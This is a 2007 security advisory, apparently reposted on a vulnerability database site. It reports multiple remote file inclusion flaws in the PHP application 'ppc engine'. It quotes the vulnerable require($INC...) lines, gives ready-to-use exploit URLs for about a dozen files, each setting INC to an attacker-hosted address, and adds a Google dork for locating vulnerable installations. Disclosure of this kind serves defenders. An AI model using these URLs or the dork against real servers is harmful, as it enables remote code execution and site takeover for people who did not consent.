ppc engine Multiple file inclusion

2007.01.14
Credit: IbnuSina
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

============================ HItamputih Crew ==================== # hitamputih Advisory # Discovered By : IbnuSina #----------------------------------------------------------- # Software: ppc engine # Method: file inclusion # Thanks To : akukasih,nyubi,irvian,BlueSpy and all #hitamputih crew [[SQL]]]--------------------------------------------------------- on dir config file config_admin.php require($INC."functions/functions_admin.php"); // require($INC."functions/functions_payment.php"); require($INC."config/admin_pw.php"); require($INC."config/config_member.php"); file config_main.php require($INC."config/site_url.php"); require($INC."config/mysql_config.php"); require($INC."functions/functions_main.php"); require($INC."functions/external_results.php"); file config_member.php ================= require($INC."functions/functions_member.php"); require($INC."functions/functions_payment.php"); file mysql_config.php =============== require($INC."functions/db_functions.php"); require($INC."config/db_info.php"); explot : http://target.lu/path/config/config_admin.php?INC=http://injekan.lu? http://target.lu/path/config/config_main.php?INC=http://injekan.lu? http://target.lu/path/config/config_member.php?INC=http://injekan.lu? http://target.lu/path/config/mysql_config.php?INC=http://injekan.lu? on dir admini file admin.php =========== require($INC."config/config_main.php"); require($INC."config/config_admin.php"); require($INC."functions/functions_bu_and_reports.php"); require($INC."config/dbstructure.php"); file index.php ============ require("path.php"); require($INC."config/config_main.php"); require($INC."config/config_admin.php"); exploit : http://target.lu/path/admini/admin.php?INC=http://injekan.lu? http://target.lu/path/admini/index.php?INC=http://injekan.lu? on dir paypalipn file ipnprocess.php require($INC."config/config_main.php"); require($INC."functions/functions_payment.php"); exploit : http://target.lu/path/paypalipn/ipnprocess.php?INC=http://injekan.lu? on dir members require($INC."config/config_main.php"); require($INC."config/config_member.php"); require($INC."functions/functions_bu_and_reports.php"); exploit : http://target.lu/path/members/index.php?INC=http://injekan.lu? http://target.lu/path/members/registration.php?INC=http://injekan.lu? on dir main file index.php require("path.php"); require($INC."config/config_main.php"); require($INC."config/config_main2.php"); require($INC."functions/functions_search.php"); mysql_connect ($DBHost, $DBLogin, $DBPassword); file ppcbannerclick.php and ppcclick.php require("path.php"); require($INC."config/config_main.php"); exploit : http://target.lu/path/main/ppcbannerclick.php?INC=http://injekan.lu? http://target.lu/path/main/ppcclick.php?INC=http://injekan.lu? google dork : intitle:"ppc engine admin login form" =======================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top